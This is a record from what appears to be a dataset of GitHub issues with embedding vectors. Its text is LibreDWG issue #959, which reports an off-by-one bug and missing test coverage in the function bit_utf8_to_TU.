0.0025644584093242884, 0.002708745189011097, -0.011396737769246101, 0.006260125432163477, -0.012181658297777176, 0.004998096730560064, 0.0049403817392885685, -0.012981968931853771, 0.01282806321978569, 0.010034670121967793, -0.005182783585041761, 0.016806533560156822, -0.018160905689001083, 0.017991608008742332, 0.009226663038134575, -0.01409778743982315, -0.014074701815843582, -0.004293976817280054, -0.003380160080268979, 0.004259347915649414, 0.001245676539838314, -0.02300894446671009, 0.015744581818580627, 0.018607232719659805, -0.002776079112663865, 0.011512166820466518, -0.022085508331656456, -0.018530279397964478, -0.00011122111754957587, -0.0004347843932919204, -0.001842062221840024, 0.02054644748568535, 0.00864951591938734, 0.02667190507054329, 0.009403655305504799, -0.014736497774720192, -0.01008084136992693, 0.024178629741072655, -0.004909600596874952, 0.011612205766141415, 0.0022123984526842833, -0.011504472233355045, 0.011827674694359303, 0.025302141904830933, 0.0031781585421413183, 0.024501832202076912, 0.026441046968102455, -0.007433658931404352, 0.024778861552476883, 0.0011090849293395877, -0.007229733280837536, 0.018299421295523643, -0.010519473813474178, -0.002731831045821309, 0.01187384594231844, -0.013012750074267387, 0.0043555391021072865, 0.015121262520551682, -0.0035205993335694075, -0.0055252243764698505, 0.007106608711183071, 0.009465217590332031, 0.0006844006711617112, 0.0134898591786623, -0.011373652145266533, 0.015175129286944866, -0.001521745347417891, -0.03444415703415871, 0.017945436760783195, 0.004948077257722616, 0.0029549947939813137, 0.003043490694835782, -0.0087880315259099, 0.01737598516047001, 0.00020392541773617268, 0.013836147263646126, -0.0018632241990417242, 0.00772992754355073, -0.011112011969089508, -0.002716440474614501, -0.0002425221464363858, -0.002073883078992367, 0.020761916413903236, 0.008995804004371166, -0.00828783679753542, 0.0016381368041038513, 0.01646794006228447, 0.0011312089627608657, 0.000596866593696177, -0.025194408372044563, 0.008841898292303085, 0.007048893719911575, -0.02350144274532795, 0.00851100031286478, -0.012173962779343128, -0.009603733196854591, -0.005105830729007721, -0.020869649946689606, 0.0028337938711047173, -0.021531445905566216, 0.00006342609412968159, -0.0017804998205974698, -0.011358261108398438, -0.005571396555751562, 0.012181658297777176, -0.002198931761085987, 0.005536767654120922, -0.000605042849201709, -0.006321688182651997, 0.00931131187826395, -0.008257055655121803, 0.007229733280837536, -0.018714966252446175, -0.0041323755867779255, 0.0026702687609940767, -0.01275880541652441, -0.019345982000231743, -0.010550254955887794, 0.0008561019785702229, -0.0005271279951557517, -0.030165571719408035, 0.014574895612895489, 0.02242410182952881, -0.002077730605378747, -0.026487218216061592, 0.0026779640465974808, 0.0013611059403046966, 0.0038611162453889847, -0.019022779539227486, -0.0004463273216970265, -0.01856106147170067, -0.002121978672221303, 0.013882319442927837, 0.01660645566880703, 0.01469032559543848, -0.003245492232963443, 0.01956144906580448, 0.01594465970993042, 0.015105871483683586, 0.02430175431072712, 0.006248582620173693, -0.0025125150568783283, -0.002668344881385565, 0.00019045865337830037, 0.009457522071897984, 0.008418656885623932, 0.006725691258907318, 0.009072757326066494, -0.008064673282206059, -0.007464440073817968, 0.011188964359462261, -0.005205869674682617, 0.005479052662849426, -0.0070104170590639114, 0.024455659091472626, -0.014836535789072514, -0.0047441516071558, 0.0037302961573004723, 0.015744581818580627, -0.0065987189300358295, -0.0010302081936970353, 0.000618509657215327, 0.013774584978818893, -0.001802623737603426, 0.024009332060813904, 0.00028472606209106743, 0.00730283884331584, -0.02040793187916279, -0.013412905856966972, 0.01856106147170067, -0.016791142523288727, 0.005013487301766872, -0.006968093104660511, 0.010480997152626514, -0.000033426455047447234, 0.0047172182239592075, -0.009788420051336288, -0.00043767012539319694, 0.023932378739118576, 0.029780806973576546, -0.008195493370294571, -0.006575632840394974, 0.0013120484072715044, 0.0023162849247455597, 0.009303616359829903, -0.014428685419261456, 0.006029266864061356, -0.0031858538277447224, -0.01988465152680874, -0.014751887880265713, 0.019607622176408768, -0.0031589202117174864, -0.00013755346299149096, -0.016237080097198486, -0.010134709067642689, -0.014059310778975487, -0.02353222481906414, 0.021054336801171303, 0.005629111081361771, 0.0069103785790503025, -0.001843985985033214, 0.01577536202967167, -0.0031473771668970585, 0.0011340946657583117, 0.003678352804854512, 0.01475958339869976, -0.014059310778975487, 0.010550254955887794, 0.007864595390856266, 0.025456048548221588, 0.01782231219112873, 0.009619123302400112, -0.011465995572507381, -0.0016477558529004455, 0.03539837524294853, 0.017145125195384026, 0.011750721372663975, -0.015259777195751667, -0.00091285485541448, 0.008988109417259693, 0.020269418135285378, 0.011304394342005253, 0.013235914520919323, 0.010734941810369492, 0.004678741563111544, 0.003916907124221325, -0.008849593810737133, 0.0014496019575744867, 0.0009527741931378841, -0.0004874490841757506, 0.013182046823203564, -0.009973106905817986, 0.0015823458088561893, -0.0010340558364987373, 0.010527168400585651, -0.018284030258655548, 0.0059792473912239075, 0.005582939367741346, -0.004747999366372824, -0.025363704189658165, -0.0001373129925923422, 0.009057367220520973, 0.01643715798854828, -0.00858025811612606, -0.01591387763619423, 0.02861112169921398, -0.0055098338052630424, -0.010927324183285236, -0.0026010109577327967, 0.023424489423632622, -0.014197826385498047, -0.007687603589147329, -0.009549865499138832, 0.012627985328435898, 0.012358649633824825, 0.0017304803477600217, 0.011319784447550774, 0.029826978221535683, 0.023516833782196045, 0.005021182354539633, -0.01455180998891592, 0.012266306206583977, -0.0009907697094604373, 0.004163156729191542, -0.002987699816003442, -0.00804158765822649, -0.013297476805746555, -0.01289732102304697, 0.010773418471217155, -0.0017843474633991718, 0.0008301303605549037, 0.0000485465134261176, -0.001514050061814487, -0.0065640900284051895, 0.009534475393593311, 0.023547613993287086, 0.027102842926979065, 0.0000263624096987769, -0.012566423043608665, -0.017114344984292984, -0.003380160080268979, -0.01925363764166832, -0.0020123205613344908, 0.010096232406795025, 0.005255889147520065, -0.004486359190195799, 0.033059004694223404, 0.027210576459765434, -0.005086592398583889, 0.01743754744529724, 0.027241358533501625, -0.006991179194301367, -0.006179324816912413, 0.007879986427724361, 0.0023451424203813076, 0.0016900800401344895, 0.019407544285058975, 0.00365141942165792, 0.0008767831022851169, 0.006833425257354975, 0.005690673366189003, 0.020100120455026627, 0.005140459630638361, 0.025502219796180725, -0.012712634168565273, -0.0000024310832031915197, -0.006094676908105612, 0.02179308608174324, -0.005575243849307299, -0.014744192361831665, 0.0003705767448991537, -0.008457133546471596, 0.019484497606754303, 0.055898651480674744, -0.010273223742842674, -0.02851877734065056, 0.0011417899513617158, -0.01028861477971077, 0.0007579869125038385, -0.015867706388235092, 0.012627985328435898, 0.0003854863753076643, 0.013913100585341454, -0.003001166507601738, 0.008457133546471596, 0.0028703464195132256, 0.025009721517562866, -0.01268954761326313, 0.007803033106029034, 0.010842676274478436, 0.00014164159074425697, 0.0011725712101906538, -0.007064284291118383, 0.014036225154995918, -0.026271751150488853, -0.0009691267041489482, 0.003033871529623866, 0.0023085896391421556, -0.00908814836293459, 0.012104704976081848, -0.013482163660228252, -0.0028972800355404615, -0.015252082608640194, 0.011689159087836742, -0.0006901721353642642, 0.0004506559344008565, -0.012774196453392506, -0.00849561020731926, -0.030057838186621666, -0.008164712227880955, -0.01162759680300951, -0.002431714441627264, 0.007853052578866482, -0.026548780500888824, 0.00040785083547234535, -0.016729580238461494, -0.0012562575284391642, -0.01268954761326313, -0.015305949375033379, 0.005844579543918371, -0.019099730998277664, -0.006829577963799238, -0.014490247704088688, 0.019900042563676834, 0.0186226237565279, -0.01716051623225212, -0.0124432984739542, 0.006033114157617092, -0.0076645174995064735, -0.005648349411785603, -0.0008940975531004369, 0.020315589383244514, -0.012920406647026539, 0.00181031902320683, 0.011843064799904823, -0.00016617035726085305, 0.016267862170934677, 0.009357483126223087, -0.02830330841243267, -0.00629090704023838, -0.0022412557154893875, 0.009734553284943104, 0.02203933522105217, 0.00302425236441195, -0.004159308969974518, 0.0241940189152956, -0.01310509443283081, 0.010727246291935444, -0.007279752753674984, 0.013166656717658043, 0.012504860758781433, 0.00024468646734021604, 0.0028818894643336535, -0.0006733386544510722, -0.011827674694359303, 0.006348621565848589, 0.02502511255443096, 0.006929616443812847, -0.006775710731744766, -0.026625733822584152, 0.015052004717290401, -0.0012937721330672503, 0.014521028846502304, -0.005848427303135395, -0.0012831911444664001, -0.039430711418390274, -0.0024028571788221598, 0.014521028846502304, 0.003943840507417917, 0.008534086868166924, 0.003235873067751527, 0.019176684319972992, -0.010504082776606083, -0.005540615413337946, 0.00931131187826395, 0.009934631176292896, 0.00029266183264553547, -0.01021935697644949, 0.015021223574876785, -0.012627985328435898, 0.003555228002369404, 0.02256261557340622, -0.009757638908922672, 0.02134675905108452, 0.01886887289583683, -0.01089654304087162, -0.0075144595466554165, -0.00903428066521883, -0.015090481378138065, 0.0016063936054706573, -0.03419790789484978, -0.003120443783700466, 0.003270501969382167, -0.018130123615264893, 0.004055422730743885, 0.008888070471584797, -0.00864951591938734, 0.011135097593069077, -0.023347536101937294, -0.007879986427724361, 0.002164302859455347, -0.02447105012834072, -0.012866539880633354, -0.009049671702086926, 0.008180102333426476, 0.01876113936305046, -0.0022816560231149197, 0.060454268008470535, 0.0074798306450247765, -0.0047518471255898476, 0.020069340243935585, 0.006483289413154125, -0.01258181408047676, 0.006771862972527742, -0.005148155149072409, 0.0017833855235949159, -0.0015813838690519333, -0.01859184168279171, -0.012566423043608665, 0.015198214910924435, -0.016037002205848694, -0.00036889337934553623, -0.002077730605378747, 0.007229733280837536, 0.004732608795166016, -0.010988886468112469, -0.024178629741072655, -0.02099277451634407, 0.0007930967258289456, 0.010988886468112469, -0.000905640481505543, -0.004486359190195799, 0.003353226464241743, -0.0039034404326230288, 0.010688770562410355, 0.008295532315969467, -0.03502900153398514, 0.01216626726090908, -0.00000195388452084444, 0.0037726203445345163, 0.0031242913100868464, 0.01081189513206482, 0.033766970038414, 0.006260125432163477, 0.018330201506614685, -0.027564560994505882, -0.00790307205170393, 0.023332146927714348, 0.008241665549576283, -0.01925363764166832, -0.007483677938580513, 0.006144695915281773, -0.0022739607375115156, -0.0008137778495438397, -0.0029569186735898256, -0.008780336007475853, -0.010819590650498867, -0.0010042365174740553, 0.0035263707395642996, 0.005275127477943897, -0.010211661458015442, -0.013536030426621437, -0.031381428241729736, -0.00851100031286478, -0.00917279627174139, -0.00674492958933115, -0.019838480278849602, -0.014967355877161026, -0.009549865499138832, 0.011712244711816311, 0.018160905689001083, -0.0066179572604596615, 0.01215087715536356, 0.025332923978567123, 0.028811199590563774, -0.012412517331540585, 0.005629111081361771, 0.0025606106501072645, -0.01939215324819088, -0.010619512759149075, 0.00043574630399234593, -0.01823785901069641, -0.024009332060813904, 0.021916210651397705, 0.0077722519636154175, 0.002085425890982151, 0.000580514082685113, -0.010350177064538002, -0.013951577246189117, 0.00858025811612606, -0.002379771089181304, -0.024563394486904144, -0.017499109730124474, -0.008049282245337963, -0.0070796748623251915, -0.013051226735115051, 0.019853871315717697, 0.0124432984739542, 0.01856106147170067, -0.034136347472667694, -0.010173184797167778, -0.011004277504980564, -0.0034609606955200434, -0.007456744555383921, 0.007468287367373705, 0.0020431019365787506, 0.01831481046974659, -0.004536378663033247, 0.01674496941268444, -0.018391763791441917, 0.0025509914848953485, 0.022131679579615593, 0.00712969433516264, -0.021069727838039398, -0.010450216010212898, -0.009003499522805214, 0.0062370398081839085, -0.0022181698586791754, 0.01660645566880703, -0.00772992754355073, 0.007933853194117546, -0.0007098913192749023, -0.0072682099416852, -0.02110050991177559, -0.0013197438092902303, 0.006198563147336245, 0.0022297129034996033, -0.018191685900092125, -0.018853481858968735, 0.0262871403247118, 0.006233192048966885, -0.00025586868287064135, -0.024501832202076912, -0.010057755745947361, 0.002085425890982151, 0.00851100031286478, -0.014074701815843582, -0.00432475795969367, -0.021746914833784103, 0.016698798164725304, 0.01969996467232704, 0.0008787069236859679, 0.01432864647358656, 0.002658725716173649, -0.0014043920673429966, 0.006548699457198381, -0.004978858400136232, -0.018437936902046204, 0.04173929989337921, -0.003026176244020462, 0.005806102883070707, 0.00017711211694404483, 0.02621018886566162, -0.03158150613307953, 0.010596426203846931, 0.004609484225511551, -0.010065451264381409, 0.017668405547738075, -0.005806102883070707, 0.030765805393457413, -0.009988497942686081, 0.0008849593577906489, -0.005359775852411985, 0.0028434130363166332, 0.013897709548473358, -0.012158572673797607, -0.0010667608585208654, -0.0035109801683574915, 0.0034340270794928074, -0.0047364565543830395, 0.012574118562042713, 0.018391763791441917, 0.007183561567217112, 0.00477878050878644, -0.006798796355724335, 0.02670268714427948, -0.008264751173555851, 0.018160905689001083, -0.006444812752306461, -0.005159697961062193, -0.008941937237977982, 0.017529889941215515, -0.00730283884331584, 0.010257833637297153, 0.0006901721353642642, 0.011381346732378006, 0.0050288778729736805, 0.030350258573889732, -0.004182395059615374, -0.024501832202076912, 0.0012350954348221421, 0.0017920427490025759, 0.016652626916766167, -0.011265917681157589, -0.014513333328068256, 0.024317145347595215, 0.016344815492630005, -0.010773418471217155, -0.003939993213862181, 0.011088925413787365, -0.008849593810737133, -0.018930435180664062, 0.008133931085467339, 0.014990442432463169, -0.005228955764323473, 0.0047018276527523994, -0.008764944970607758, 0.003963078837841749, -0.026333313435316086, -0.011496776714920998, 0.02482503466308117 ]
null
null
null
null
null
null
null
null
null
[ "LibreDWG", "libredwg" ]
off-by-one. also no test coverage. this could fix some encoding tickets
bit_utf8_to_TU is broken
https://api.github.com/repos/LibreDWG/libredwg/issues/959/comments
0
2024-03-15T09:11:05
2024-03-19T07:29:30Z
https://github.com/LibreDWG/libredwg/issues/959
2,188,048,617
959
false
This is a GitHub Issue repo:libredwg owner:LibreDWG Title : bit_utf8_to_TU is broken Issue date: --- start body --- off-by-one. also no test coverage. this could fix some encoding tickets --- end body ---
209
[ -0.013916015625, 0.005477105267345905, -0.0006599875050596893, 0.009123547933995724, 0.03804206848144531, 0.04956185072660446, -0.006954286713153124, 0.05426501855254173, -0.02567393146455288, -0.015627611428499222, -0.015225757844746113, 0.016922470182180405, -0.011490014381706715, 0.00483339698985219, -0.00046906087663955986, 0.012449996545910835, -0.007248234935104847, 0.006392437033355236, -0.024527907371520996, -0.005425013601779938, 0.003804579144343734, -0.006470574997365475, 0.004223175812512636, 0.03828020393848419, -0.021342851221561432, -0.003828764660283923, -0.011772800236940384, -0.0067719644866883755, -0.015835978090763092, -0.023456299677491188, 0.005875237286090851, 0.03283286467194557, 0.006451970897614956, 0.0008097520912997425, 0.04375731199979782, -0.012479763478040695, 0.0434001088142395, 0.03223752975463867, -0.018782900646328926, 0.010961652733385563, -0.01213744468986988, -0.052240870893001556, -0.013997874222695827, 0.05084182694554329, -0.01212256122380495, 0.008371934294700623, 0.004848279990255833, 0.0026715772692114115, -0.03357703983783722, 0.0012343951966613531, -0.023887919262051582, -0.010143063962459564, -0.0029692461248487234, -0.029737111181020737, 0.014965297654271126, -0.002985989907756448, 0.028591085225343704, 0.02226562425494194, 0.008974713273346424, 0.02522742934525013, -0.009093781001865864, 0.016654567793011665, 0.025450680404901505, 0.03235659748315811, 0.021417267620563507, 0.026641355827450752, -0.026537170633673668, -0.004572936799377203, 0.0007069633575156331, 0.007977522909641266, -0.01643131673336029, -0.0044352649711072445, 0.010329106822609901, 0.03917321190237999, 0.04447171464562416, -0.03387470543384552, 0.046763766556978226, 0.006864986382424831, -0.01678851991891861, 0.008624953217804432, -0.012323487550020218, 0.021357735618948936, -0.010076087899506092, 0.024170704185962677, -0.014221126213669777, 0.022429341450333595, -0.016178298741579056, -0.06596340239048004, -0.04420381411910057, -0.02756412886083126, -0.023947453126311302, 0.0403936542570591, -0.029975246638059616, -0.021119600161910057, 0.020955881103873253, -0.004003644920885563, -0.020598679780960083, 0.010090971365571022, -0.042298734188079834, -0.015642493963241577, 0.0026641355361789465, 0.012829524464905262, 0.0019869389943778515, -0.0006116162985563278, 0.041643861681222916, -0.00301947770640254, 0.03330913558602333, 0.01696711964905262, 0.031255222856998444, 0.08590720593929291, 0.017547573894262314, 0.01879778318107128, -0.020940998569130898, 0.0014306706143543124, -0.012621155939996243, 0.024111170321702957, 0.017428506165742874, -0.025629281997680664, -0.031523123383522034, 0.014593211933970451, -0.021030299365520477, -0.024498140439391136, -0.02460232377052307, -0.029558509588241577, -0.01702665351331234, 0.026537170633673668, -0.006224998272955418, 0.002035310259088874, -0.02492976002395153, -0.020122408866882324, -0.012621155939996243, -0.007880780845880508, 0.015582960098981857, -0.015419242903590202, 0.020732630044221878, -0.012546738609671593, -0.03836950659751892, 0.04319173842668533, 0.001717176754027605, -0.01924428716301918, -0.04935348406434059, -0.011050953529775143, 0.015374592505395412, -0.01384159829467535, -0.04991905391216278, 0.021863771602511406, -0.01577644608914852, 0.018574532121419907, 0.023887919262051582, 0.016773635521531105, 0.0028557598125189543, -0.03208869323134422, 0.036107223480939865, -0.005745007190853357, 0.037357430905103683, -0.010641658678650856, 0.019943807274103165, 0.03182079270482063, 0.0016390386736020446, -0.0070807961747050285, -0.026507403701543808, 0.005804541055113077, 0.0389053076505661, -0.02292049489915371, -0.036315590143203735, 0.0260311346501112, 0.041078291833400726, 0.029766878113150597, -0.007192421704530716, 0.02504882775247097, -0.007538461592048407, 0.03744673356413841, 0.009614701382815838, -0.0013488116674125195, -0.029826411977410316, -0.023962335661053658, -0.01756245829164982, 0.021372618153691292, -0.009294707328081131, -0.0347081795334816, -0.01625271514058113, 0.018083378672599792, 0.007121725473552942, 0.0102472472935915, 0.009145873598754406, -0.01643131673336029, 0.03447004407644272, 0.005834307987242937, -0.00045068914187140763, -0.018663832917809486, -0.009696559980511665, -0.01396066602319479, -0.015255524776875973, -0.042685702443122864, 0.024021869525313377, -0.0070882379077374935, -0.04003645107150078, -0.02170005440711975, 0.020420078188180923, -0.0037766725290566683, 0.030838485807180405, 0.035541653633117676, -0.010224922560155392, -0.018872199580073357, -0.04396567866206169, 0.0314338244497776, -0.030540816485881805, 0.037714634090662, -0.00472921272739768, -0.012494646944105625, -0.005220366176217794, -0.020241476595401764, 0.01897638477385044, 0.04694236442446709, -0.011497456580400467, 0.01138583105057478, -0.007147771306335926, 0.018247095867991447, 0.0002872038458008319, -0.001530203502625227, 0.041971296072006226, -0.030808718875050545, 0.029662692919373512, 0.00570779899135232, -0.026566937565803528, -0.03333890438079834, 0.00858774408698082, 0.016624800860881805, 0.013432303443551064, 0.03010919690132141, 0.024498140439391136, -0.041643861681222916, -0.012189536355435848, -0.006150580942630768, 0.005354316905140877, 0.009480750188231468, 0.014920647256076336, -0.03211846202611923, -0.06051606312394142, -0.019943807274103165, 0.006615688558667898, 0.07697714865207672, -0.0027534360997378826, -0.03464864566922188, 0.009190523065626621, 0.041405726224184036, 0.013469512574374676, -0.02016706019639969, -0.03887554258108139, 0.03473794460296631, -0.015672260895371437, -0.025539981201291084, 0.04319173842668533, 0.014362518675625324, 0.017681526020169258, 0.012241628021001816, 0.01292626652866602, 0.034410510212183, -0.03274356573820114, -0.017845243215560913, 0.031344521790742874, 0.03988761454820633, -0.014794138260185719, 0.0068128942511975765, -0.005759890656918287, -0.0043385224416852, -0.017785709351301193, -0.0033785405103117228, -0.012703015469014645, -0.03572025150060654, 0.035541653633117676, 0.011795124970376492, 0.026998557150363922, 0.003804579144343734, -0.014533678069710732, 0.010343990288674831, -0.022667476907372475, 0.0054436177015304565, 0.0011116068344563246, -0.003002733690664172, -0.03010919690132141, 0.0332198366522789, -0.017041537910699844, 0.004011086653918028, -0.0068277777172625065, -0.023575367406010628, -0.016208065673708916, 0.024587441235780716, -0.03854810819029808, -0.0568547360599041, 0.002132052555680275, -0.0040966663509607315, -0.01693735271692276, 0.006057559512555599, -0.0484902448952198, 0.019884273409843445, 0.023694435134530067, -0.024527907371520996, -0.014459260739386082, -0.021089833229780197, 0.014355076476931572, -0.013491837307810783, -0.014131825417280197, -0.03774439916014671, -0.036375124007463455, -0.010299339890480042, -0.0023608854971826077, -0.001150675816461444, -0.05765844136476517, 0.002898549661040306, 0.036970462650060654, -0.05149669945240021, 0.010343990288674831, -0.022340042516589165, 0.007992406375706196, -0.026790190488100052, 0.0057264030911028385, -0.017339205369353294, -0.024617208167910576, -0.005990583915263414, -0.04982975497841835, -0.010023996233940125, -0.03461887687444687, -0.011475130915641785, 0.05227063596248627, -0.03013896383345127, 0.009800744242966175, 0.053133875131607056, -0.001732060220092535, 0.0004288290801923722, 0.00344923697412014, -0.00641848286613822, -0.014228567481040955, -0.014429493807256222, -0.0073486980982124805, -0.047865137457847595, -0.028144583106040955, -0.006243602372705936, -0.009785860776901245, -0.009272382594645023, 0.005566406063735485, 0.018961500376462936, 0.031582657247781754, -0.001211139839142561, 0.02309909649193287, -0.010381198488175869, 0.008580302819609642, 0.015173666179180145, 0.0075831119902431965, 0.021506568416953087, 0.0008320772321894765, 0.020821930840611458, 0.01729455590248108, 0.03905414417386055, -0.0022064698860049248, -0.012278837151825428, -0.023634901270270348, -0.018723366782069206, 0.023396765813231468, 0.018514998257160187, 0.0015413661021739244, -0.019586605951189995, 0.00003279007796663791, 0.00038487641722895205, -0.00150973885320127, 0.020003341138362885, 0.022935379296541214, -0.003159009851515293, 0.0070249829441308975, -0.020390311256051064, -0.015047156251966953, 0.05036555603146553, -0.014228567481040955, -0.015404359437525272, -0.03851833939552307, 0.002520882524549961, 0.011542106978595257, 0.021268434822559357, 0.04033412039279938, 0.010783051140606403, -0.02525719627737999, -0.03214822709560394, 0.007917989045381546, -0.04872838035225868, -0.007069633342325687, 0.02430465631186962, -0.007594274822622538, 0.010805376805365086, -0.007043587509542704, -0.03369610384106636, -0.009056572802364826, 0.009599817916750908, -0.00017371763533446938, -0.04438241571187973, 0.014399726875126362, 0.0547710545361042, -0.018247095867991447, -0.00947330892086029, 0.01111792866140604, -0.007274280767887831, -0.008208216167986393, -0.04649586230516434, 0.008148682303726673, -0.012345812283456326, 0.002014845609664917, 0.015463893301784992, -0.007516136392951012, -0.02475115843117237, 0.005157111678272486, -0.03819090500473976, 0.009986787103116512, -0.013558812439441681, -0.014496469870209694, -0.0014222986064851284, 0.02298002876341343, 0.006265927571803331, -0.02881433814764023, -0.01788989268243313, -0.05030602216720581, -0.009510517120361328, -0.006027792580425739, 0.0010725378524512053, -0.014146708883345127, -0.017190372571349144, 0.026715772226452827, -0.017160605639219284, -0.021268434822559357, 0.013268585316836834, 0.031582657247781754, -0.0374169647693634, -0.004223175812512636, 0.004967347718775272, 0.042566634714603424, 0.023441415280103683, -0.02827853336930275, -0.02324793115258217, -0.03164219111204147, -0.010396081954240799, -0.004628749564290047, 0.011713266372680664, 0.008059382438659668, 0.03908390924334526, 0.0025525097735226154, -0.04962138459086418, -0.004528286401182413, -0.009227732196450233, -0.0661420002579689, -0.005730123724788427, 0.006615688558667898, -0.01759222522377968, 0.00430875550955534, 0.015158782713115215, -0.03744673356413841, -0.0038250437937676907, 0.008252866566181183, -0.025867417454719543, -0.015806211158633232, -0.017964310944080353, 0.06560619920492172, -0.009711443446576595, -0.02031589485704899, 0.014332751743495464, -0.01708618737757206, -0.007545903325080872, 0.023322349414229393, 0.009346799924969673, 0.05173483490943909, -0.05998025834560394, 0.0038696941919624805, -0.013685322366654873, -0.020777281373739243, -0.008237983100116253, -0.005893841851502657, -0.023634901270270348, -0.024006986990571022, 0.04661493003368378, -0.007430556695908308, -0.017339205369353294, -0.023739084601402283, -0.018187562003731728, -0.001531133777461946, -0.04057225584983826, -0.011787683703005314, -0.01723502203822136, 0.01294114999473095, -0.014518794603645802, 0.04491821676492691, -0.005912445951253176, 0.004271546844393015, 0.03786346688866615, 0.00966679397970438, 0.0020781001076102257, 0.0023404208477586508, -0.03289239853620529, -0.003025058889761567, 0.0031627307180315256, 0.0028557598125189543, -0.00851332675665617, 0.027906447649002075, 0.009815627709031105, 0.0030436632223427296, 0.023605134338140488, 0.0035366772208362818, 0.029141772538423538, 0.03336866945028305, -0.042507100850343704, -0.02238469198346138, 0.05989095941185951, -0.012688132002949715, -0.019467538222670555, -0.0006990565452724695, -0.04947255179286003, -0.007739388383924961, -0.03274356573820114, -0.014407169073820114, 0.004483636002987623, 0.013938340358436108, 0.005447338800877333, 0.012330928817391396, 0.010931885801255703, -0.027727846056222916, -0.010224922560155392, 0.0067980107851326466, 0.041941531002521515, 0.020717747509479523, 0.026016250252723694, 0.00959237664937973, -0.02187865599989891, 0.010195155628025532, -0.017636874690651894, -0.020330777391791344, -0.026373453438282013, -0.015999697148799896, 0.03476771339774132, -0.01613364741206169, 0.01655038446187973, -0.012948592193424702, 0.003981319721788168, 0.012688132002949715, -0.002541347173973918, 0.008081707172095776, 0.03899461030960083, -0.0397983156144619, 0.01672898605465889, -0.015233200043439865, 0.017547573894262314, -0.014764371328055859, 0.013529045507311821, -0.0003688302240334451, -0.024885110557079315, -0.02594183385372162, 0.006288252770900726, -0.02268236130475998, 0.011914192698895931, 0.0009060293668881059, 0.019854506477713585, -0.006905915681272745, -0.0034380743745714426, 0.024944644421339035, 0.014481586404144764, 0.00022290274500846863, 0.01759222522377968, 0.03196962550282478, 0.0014362517977133393, 0.00788822304457426, 0.0035013288725167513, 0.01143048144876957, 0.017964310944080353, -0.03277333080768585, -0.03768486529588699, 0.020360544323921204, -0.014221126213669777, 0.0015878769336268306, -0.005655706860125065, -0.005361758638173342, -0.010358873754739761, 0.014630420133471489, 0.015731794759631157, -0.005235249642282724, -0.015969930216670036, 0.02256329357624054, -0.05152646452188492, -0.008833320811390877, 0.023649783805012703, 0.022890729829669, -0.015910396352410316, -0.007374743930995464, -0.0015404359437525272, 0.009570050984621048, -0.011556990444660187, 0.0011088162427768111, 0.016297364607453346, 0.012383021414279938, -0.01744339056313038, 0.02786179818212986, -0.015136457048356533, -0.026165084913372993, 0.020509378984570503, 0.01992892473936081, 0.006556154694408178, -0.028739919885993004, 0.04560285806655884, 0.019199635833501816, -0.004457589704543352, -0.035869088023900986, 0.017994077876210213, 0.01998845860362053, -0.011527223512530327, -0.023500949144363403, 0.03268403187394142, -0.011817450635135174, 0.009584934450685978, 0.06536806374788284, -0.000017296184523729607, 0.031255222856998444, -0.022965146228671074, -0.00017418274364899844, 0.010343990288674831, -0.01619318127632141, -0.0013106728438287973, 0.02019682712852955, -0.020479612052440643, -0.011802567169070244, -0.004212012980133295, 0.014116941951215267, 0.036910928785800934, 0.0032669147476553917, -0.03004966303706169, 0.006094768177717924, -0.013268585316836834, -0.012323487550020218, 0.00858774408698082, 0.02187865599989891, -0.011482573114335537, -0.017011770978569984, 0.04033412039279938, 0.02007775940001011, 0.013179285451769829, -0.002399954479187727, -0.0020874023903161287, -0.0068128942511975765, 0.01732432283461094, -0.006760802119970322, 0.001879034098237753, -0.018872199580073357, -0.022697243839502335, 0.00027162276091985404, 0.022072140127420425, -0.002476232126355171, 0.026165084913372993, -0.05730123817920685, 0.0027980864979326725, -0.004052016418427229, 0.024587441235780716, 0.01655038446187973, 0.00561849819496274, 0.007519857492297888, 0.036523960530757904, -0.019080568104982376, -0.006422203965485096, -0.004029691219329834, 0.014340193010866642, -0.011899309232831001, -0.04896651208400726, 0.014325309544801712, -0.024021869525313377, 0.018842432647943497, -0.03265426307916641, -0.026864606887102127, 0.023605134338140488, 0.01455600280314684, -0.018023844808340073, 0.01658015139400959, 0.0011841636151075363, -0.026611588895320892, -0.0009213779121637344, 0.022310275584459305, 0.016892703250050545, -0.006470574997365475, 0.014622978866100311, 0.0329221673309803, -0.0015488078352063894, 0.0068054525181651115, -0.018842432647943497, -0.02472139149904251, 0.0009181221248582006, -0.030124079436063766, -0.006641734391450882, -0.006124535109847784, -0.030600350350141525, 0.03994714841246605, 0.014369959942996502, 0.01622294820845127, -0.010693750344216824, 0.010894677601754665, 0.03310076892375946, 0.027251577004790306, -0.01384159829467535, -0.0018399651162326336, 0.0035590024199336767, -0.05983142554759979, -0.0036464424338191748, 0.008401701226830482, -0.012271394953131676, -0.016327131539583206, 0.029156656935811043, 0.0015292733442038298, 0.016148531809449196, 0.008974713273346424, 0.01134118065237999, -0.02546556293964386, 0.010336548089981079, -0.018217328935861588, 0.002357164630666375, -0.02528696320950985, -0.021089833229780197, 0.03816113620996475, 0.02597160078585148, -0.03447004407644272, -0.01660991832613945, -0.020762396976351738, -0.04536472260951996, -0.0017739199101924896, -0.031731490045785904, -0.011966284364461899, 0.006344066001474857, -0.006355228368192911, 0.01276254840195179, 0.011475130915641785, 0.015255524776875973, -0.01756245829164982, -0.009689118713140488, 0.037357430905103683, 0.022161440923810005, -0.03327937051653862, 0.014377402141690254, -0.006760802119970322, -0.00320924143306911, 0.012509530410170555, -0.004621307831257582, 0.03360680490732193, 0.017220139503479004, -0.022340042516589165, -0.02546556293964386, -0.007650087587535381, -0.036613259464502335, -0.004130154382437468, 0.03265426307916641, -0.029454326257109642, -0.003246450098231435, 0.0027180879842489958, -0.012144885957241058, 0.004777583759278059, -0.013476953841745853, -0.017636874690651894, 0.021179134026169777, 0.031523123383522034, -0.013357886113226414, 0.012271394953131676, -0.01120722945779562, -0.02172982133924961, -0.018187562003731728, -0.01565737836062908, 0.005893841851502657, 0.023471182212233543, -0.010351431556046009, 0.0010604449780657887, 0.010485382750630379, 0.015374592505395412, -0.018782900646328926, 0.0016771774971857667, 0.01141559798270464, -0.01640154980123043, 0.006526387762278318, 0.013409978710114956, -0.00640359940007329, 0.02594183385372162, 0.00472921272739768, -0.002535765990614891, 0.013104868121445179, -0.024006986990571022, -0.017279673367738724, -0.025778116658329964, 0.023992102593183517, 0.013804389163851738, 0.005131065379828215, 0.00875146221369505, -0.01285184919834137, 0.030034780502319336, -0.013462070375680923, -0.041733164340257645, -0.05402688309550285, 0.04476938396692276, 0.01732432283461094, -0.009339357726275921, -0.03884577378630638, 0.0012157908640801907, 0.03235659748315811, -0.0006995216244831681, -0.012130002491176128, 